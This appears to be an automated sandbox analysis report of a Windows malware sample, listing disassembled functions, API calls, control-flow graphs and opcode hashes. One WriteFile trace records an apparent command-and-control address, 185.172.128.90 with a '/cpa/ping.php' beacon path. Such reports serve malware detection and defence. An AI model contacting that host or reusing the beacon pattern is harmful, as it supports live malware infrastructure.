                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,0041631B,?,?,?,?,?,?,?,?,?,00427665,000000FF), ref: 0041645D
                                                                                                                                                                                                                                              • __dosmaperr.LIBCMT ref: 00416488
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1555897451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1555897451.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_zLwT7vCojz.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ChangeCloseErrorFindLastNotification__dosmaperr
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 490808831-0
                                                                                                                                                                                                                                              • Opcode ID: 139c316f0d34cae01b774305b8ab889bfc55088184a7960cb4481621f44fdba6
                                                                                                                                                                                                                                              • Instruction ID: aa9397e3c223395acf83e04721932d84fcb93a289d6ab5d19588dbc87750978f
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 139c316f0d34cae01b774305b8ab889bfc55088184a7960cb4481621f44fdba6
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4F016B33A101201AD6355675A8457FF2B494B82B38F27016FFC18972D1DF6CDCC6469D
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 1678 419767-41977f call 41e97a 1681 419781-419786 call 412381 1678->1681 1682 419792-4197a8 SetFilePointerEx 1678->1682 1689 41978c-419790 1681->1689 1683 4197b9-4197c3 1682->1683 1684 4197aa-4197b7 GetLastError call 41234b 1682->1684 1688 4197c5-4197da 1683->1688 1683->1689 1684->1689 1690 4197df-4197e4 1688->1690 1689->1690
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • SetFilePointerEx.KERNEL32(00000000,?,00000002,?,00000000,?,?,?,?,?,00419816,?,?,00000002,00000000), ref: 004197A0
                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,00419816,?,?,00000002,00000000,?,00416146,?,00000000,00000000,00000002,?,?,?,?), ref: 004197AA
                                                                                                                                                                                                                                              • __dosmaperr.LIBCMT ref: 004197B1
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1555897451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1555897451.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_zLwT7vCojz.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ErrorFileLastPointer__dosmaperr
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2336955059-0
                                                                                                                                                                                                                                              • Opcode ID: 6955d807685c1ca33d0ae090671f376d44056e1be3e06fc28f14aab88d4da9d5
                                                                                                                                                                                                                                              • Instruction ID: aba61adf325f610bb64cc2fd6d97dc3a8945be917003060b225fa659b6e0b810
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6955d807685c1ca33d0ae090671f376d44056e1be3e06fc28f14aab88d4da9d5
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8E012D37B20119ABCB159F99DC059EE7B19DF85330B28024EFC21972D0EA749C918798
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 1692 426217-42623c CreateFileA 1693 426259-42625f 1692->1693 1694 42623e-426253 WriteFile FindCloseChangeNotification 1692->1694 1694->1693
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000004,00000080,00000000,?,00002000,00000000,?,?,0042588E,00000001,?,00002000), ref: 00426232
                                                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,?,?,00002000,00000000,?,0042588E,00000001,?,00002000,185.172.128.90,/cpa/ping.php?substr=%s&s=ab&sub=%s,?), ref: 0042624A
                                                                                                                                                                                                                                              • FindCloseChangeNotification.KERNEL32(00000000,?,0042588E,00000001,?,00002000,185.172.128.90,/cpa/ping.php?substr=%s&s=ab&sub=%s,?), ref: 00426253
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1555897451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1555897451.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_zLwT7vCojz.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: File$ChangeCloseCreateFindNotificationWrite
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3805958096-0
                                                                                                                                                                                                                                              • Opcode ID: ea6e1008648175cfb482bb30eeb8851ccd6d366c881e9156fb96c3698a6c4966
                                                                                                                                                                                                                                              • Instruction ID: 926e9ac1e5f1aba45008a0d26bda579428ca80e0843417663d772dc166ed892d
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ea6e1008648175cfb482bb30eeb8851ccd6d366c881e9156fb96c3698a6c4966
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 73E06572701120BBD7351B99AC48FABBE6DEF856F0F050169FB01E21109A61DC0197B4
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 1703 401bb2-401c21 call 4275a4 call 40307c call 402fe5 call 402f6b 1712 401c51-401c61 1703->1712 1713 401c23-401c47 1703->1713 1713->1712 1714 401c49-401c4c call 40187f 1713->1714 1714->1712
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • __EH_prolog.LIBCMT ref: 00401BB7
                                                                                                                                                                                                                                                • Part of subcall function 0040307C: __EH_prolog.LIBCMT ref: 00403081
                                                                                                                                                                                                                                                • Part of subcall function 00402FE5: __EH_prolog.LIBCMT ref: 00402FEA
                                                                                                                                                                                                                                                • Part of subcall function 00402FE5: std::locale::_Init.LIBCPMT ref: 0040300E
                                                                                                                                                                                                                                                • Part of subcall function 00402F6B: __EH_prolog.LIBCMT ref: 00402F70
                                                                                                                                                                                                                                                • Part of subcall function 0040187F: __CxxThrowException@8.LIBVCRUNTIME ref: 004018C9
                                                                                                                                                                                                                                                • Part of subcall function 0040187F: std::system_error::system_error.LIBCPMT ref: 004018D8
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1555897451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1555897451.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_zLwT7vCojz.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: H_prolog$Exception@8InitThrowstd::locale::_std::system_error::system_error
                                                                                                                                                                                                                                              • String ID: v*@
                                                                                                                                                                                                                                              • API String ID: 3966877926-3062513736
                                                                                                                                                                                                                                              • Opcode ID: b206c63552d3cfde46f7048d87b5e92c7bdaa8cdd7915c41a842bf4ae9388a12
                                                                                                                                                                                                                                              • Instruction ID: b9e6d0c04dc114dbe46ca1cb3692bd7dbb1da951860286197dc681cf7a8c4379
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b206c63552d3cfde46f7048d87b5e92c7bdaa8cdd7915c41a842bf4ae9388a12
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E82190B1711206AFD708DF59C889A6AF7F9FF48348F14826EE115A7341C7B8DE008B94
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • __EH_prolog.LIBCMT ref: 00425EE7
                                                                                                                                                                                                                                                • Part of subcall function 00401BB2: __EH_prolog.LIBCMT ref: 00401BB7
                                                                                                                                                                                                                                                • Part of subcall function 00402403: __EH_prolog.LIBCMT ref: 00402408
                                                                                                                                                                                                                                              • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00425FC9
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1555897451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1555897451.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_zLwT7vCojz.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: H_prolog$Ios_base_dtorstd::ios_base::_
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 420165198-0
                                                                                                                                                                                                                                              • Opcode ID: c9a2dfee6a5dc0c00aeaf27a507da7a8fac60e2bd9c285666c44caec7eae5a08
                                                                                                                                                                                                                                              • Instruction ID: 8b308e217030a11e536693c7e770bb36c60ea871e1947f1e620e0115d8c257f2
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c9a2dfee6a5dc0c00aeaf27a507da7a8fac60e2bd9c285666c44caec7eae5a08
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3B311570D01119EBDB14EF95E985AEDFBB4BF48304F1080AEE805B3681EB786A04CB64
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 1753 4320e0f-4320e24 SetErrorMode * 2 1754 4320e26 1753->1754 1755 4320e2b-4320e2c 1753->1755 1754->1755
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • SetErrorMode.KERNEL32(00000400,?,?,04320223,?,?), ref: 04320E19
                                                                                                                                                                                                                                              • SetErrorMode.KERNEL32(00000000,?,?,04320223,?,?), ref: 04320E1E
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1558244577.0000000004320000.00000040.00001000.00020000.00000000.sdmp, Offset: 04320000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_4320000_zLwT7vCojz.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ErrorMode
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2340568224-0
                                                                                                                                                                                                                                              • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                                                                                                                                              • Instruction ID: fd19119ecc66135e58e8f0a75be676a6736d9e7f2bb82d6b6bf4c37b2cce7ee0
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 12D0123114512877D7402A94DC09BCD7B2CDF05B62F008011FB0DD9080C770954046E5
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1555897451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1555897451.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_zLwT7vCojz.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 2ae4b7848d5fc5729d99f5a7e27ee10caa38967bc1771efee0ecf6ad26560584
                                                                                                                                                                                                                                              • Instruction ID: d77f3fb4a2dea80d7e26f58f35abdac3f7963be9eaf0666b1d936bf3e200b83d
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2ae4b7848d5fc5729d99f5a7e27ee10caa38967bc1771efee0ecf6ad26560584
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 11510771A00108AFDB10DF29C840BFA7BA1EF85364F19815EE8489B392CB39DD82C759
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1555897451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1555897451.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_zLwT7vCojz.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: __fread_nolock
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2638373210-0
                                                                                                                                                                                                                                              • Opcode ID: 25aeabf7499e8ad583be7248ba51f421055d1c52451b24307ef19921f3e1bf67
                                                                                                                                                                                                                                              • Instruction ID: 0bde1253143090ae73d8540e9fd285f072e0ff93183f3a7406587cf81db67a05
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 25aeabf7499e8ad583be7248ba51f421055d1c52451b24307ef19921f3e1bf67
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CF316B31604706AFC710DE29C884A5ABBA0BF88354F04863EF954A73A1D779D854CB9A
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • __EH_prolog.LIBCMT ref: 004024A6
                                                                                                                                                                                                                                                • Part of subcall function 0040187F: __CxxThrowException@8.LIBVCRUNTIME ref: 004018C9
                                                                                                                                                                                                                                                • Part of subcall function 0040187F: std::system_error::system_error.LIBCPMT ref: 004018D8
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1555897451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1555897451.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_zLwT7vCojz.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Exception@8H_prologThrowstd::system_error::system_error
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 938716162-0
                                                                                                                                                                                                                                              • Opcode ID: 540de7721727b4ca24ecd9efb376f8aeec338981f0a8d92e2b0ead1ad3aa5908
                                                                                                                                                                                                                                              • Instruction ID: 51a424f7f6e89c6a531f911fc24cb136489b0386115aa572e9e255c0d5409117
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 540de7721727b4ca24ecd9efb376f8aeec338981f0a8d92e2b0ead1ad3aa5908
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B9318B71A00505AFCB18DF69C9D5E6AB7F5FF84318718C16EE416AB791C634EC40CB54
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • __EH_prolog.LIBCMT ref: 00402581
                                                                                                                                                                                                                                                • Part of subcall function 00402B06: __EH_prolog.LIBCMT ref: 00402B0B
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1555897451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1555897451.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_zLwT7vCojz.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: H_prolog
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3519838083-0
                                                                                                                                                                                                                                              • Opcode ID: b880830fb10006c245270c451b658a342de933d97101c235293ed34406791828
                                                                                                                                                                                                                                              • Instruction ID: 5794e906f2440793f0f111a630642e31dc7bb6ced8b38f44c89e924cf631a0c7
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b880830fb10006c245270c451b658a342de933d97101c235293ed34406791828
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 87318770A00615AFCB15DF09CA84A9ABBB1FF48314F14856EE405AB791C7B9ED40CB94
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • __EH_prolog.LIBCMT ref: 00402408
                                                                                                                                                                                                                                                • Part of subcall function 00402B06: __EH_prolog.LIBCMT ref: 00402B0B
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1555897451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1555897451.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_zLwT7vCojz.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: H_prolog
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3519838083-0
                                                                                                                                                                                                                                              • Opcode ID: d6c6d0674046824ae49e356bd95e2b3b32d4d687766b11b914c442daf499c3b2
                                                                                                                                                                                                                                              • Instruction ID: 4e0495d31301cfc09fe992fc8428b3d42591f74c8e771436201b91ad316d0700
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d6c6d0674046824ae49e356bd95e2b3b32d4d687766b11b914c442daf499c3b2
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9D217C70601611DFC728DF19C54896ABBF5FF88314B20C26DE85A9B7A1C774AE41CB90
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1555897451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1555897451.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_zLwT7vCojz.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: H_prolog
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3519838083-0
                                                                                                                                                                                                                                              • Opcode ID: 94d41c902baa54b1b7ab3027f5a178ce52665b7b455d6233b737f42a58ba5fa1
                                                                                                                                                                                                                                              • Instruction ID: ebd396bbc56fc5044348258bf57d62a6d48641e9a3723b70d5712ae04e929cd2
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 94d41c902baa54b1b7ab3027f5a178ce52665b7b455d6233b737f42a58ba5fa1
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9511D031A042048ECB04DFA9C895BEEBFB4BF44314F08812ED8417B2C2D7789A45CB64
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1555897451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1555897451.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_zLwT7vCojz.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: __wsopen_s
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3347428461-0
                                                                                                                                                                                                                                              • Opcode ID: 9d91d9df30251d2d82c78a357851f1850054374a36094e401c27366056efc238
                                                                                                                                                                                                                                              • Instruction ID: 62b4485d732ad4ebc0017ff3881fb56af0f069673ee8f9cf524c42d6b5156d4d
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9d91d9df30251d2d82c78a357851f1850054374a36094e401c27366056efc238
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6911367590410AAFCB05DF98E9419EB7BF4EF48314F0040AAF819AB311D631E9618BA9
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1555897451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1555897451.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_zLwT7vCojz.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 6507e6dca9fd37c1152104383e81a26a388e7b6248357c92fed83c7c77d0c48c
                                                                                                                                                                                                                                              • Instruction ID: bb13e13d757cd37dfe0a4f239b5d8845d05e4a8eb61872b1cde1787caac163ea
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6507e6dca9fd37c1152104383e81a26a388e7b6248357c92fed83c7c77d0c48c
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E4F0F93254061496D6213A6B9C0579B32AC9F92339F114BBFFC30A61C2CA7CE95246AE
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • __EH_prolog.LIBCMT ref: 00402F70
                                                                                                                                                                                                                                                • Part of subcall function 004035F5: __EH_prolog.LIBCMT ref: 004035FA
                                                                                                                                                                                                                                                • Part of subcall function 004035F5: std::_Lockit::_Lockit.LIBCPMT ref: 00403609
                                                                                                                                                                                                                                                • Part of subcall function 004035F5: int.LIBCPMT ref: 00403620
                                                                                                                                                                                                                                                • Part of subcall function 004035F5: std::locale::_Getfacet.LIBCPMT ref: 00403629
                                                                                                                                                                                                                                                • Part of subcall function 004035F5: std::_Lockit::~_Lockit.LIBCPMT ref: 00403670
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1555897451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1555897451.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_zLwT7vCojz.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: H_prologLockitstd::_$GetfacetLockit::_Lockit::~_std::locale::_
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3585332825-0
                                                                                                                                                                                                                                              • Opcode ID: 9e5b33f735e5741d3742e5114604eb84fbebb543a0d7af76fa80b020808a8594
                                                                                                                                                                                                                                              • Instruction ID: 4123f54f6db546b52d5441bf0cc69889d4086bdab9222fcc4d2dc13d92cadc12
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9e5b33f735e5741d3742e5114604eb84fbebb543a0d7af76fa80b020808a8594
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 32018F70610114AFDB14DB65CA0ABAEB3F9AF44708F00403EF405B76D1DBF8AE408B58
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1555897451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1555897451.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_zLwT7vCojz.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: _free
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 269201875-0
                                                                                                                                                                                                                                              • Opcode ID: e7ba057ced36894faabbf0cfef253f3c85e20b59e21e5f6d36d312241c511836
                                                                                                                                                                                                                                              • Instruction ID: b492b302e4735b3d70b5ef79ffcf6f17a9fdb10017537b69176e17197afc0c8a
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e7ba057ced36894faabbf0cfef253f3c85e20b59e21e5f6d36d312241c511836
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6DF09A3251111CBBCF015E96DC01DDA3B6EEF89324F100256FD2492050DA3ACA61ABA5
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0041B4CD,00000000,?,00410DE7,?,00000008,?,00411992,?,?,?), ref: 00417A77
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1555897451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1555897451.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_zLwT7vCojz.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: AllocateHeap
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1279760036-0
                                                                                                                                                                                                                                              • Opcode ID: 092e8eca157d4569dfa0d65f99c280fa9eac993ee60f56a2dbe510387d4a55ad
                                                                                                                                                                                                                                              • Instruction ID: dd4a480e522f73ad3d9a6edd52b828d095e0909c103fd04d4038ae70eb088b48
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 092e8eca157d4569dfa0d65f99c280fa9eac993ee60f56a2dbe510387d4a55ad
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 35E0A03128822557972026629C00BDF6A69AF417E0B150223BC0496290CA5C8BD182AD
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 00409967
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1555897451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1555897451.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
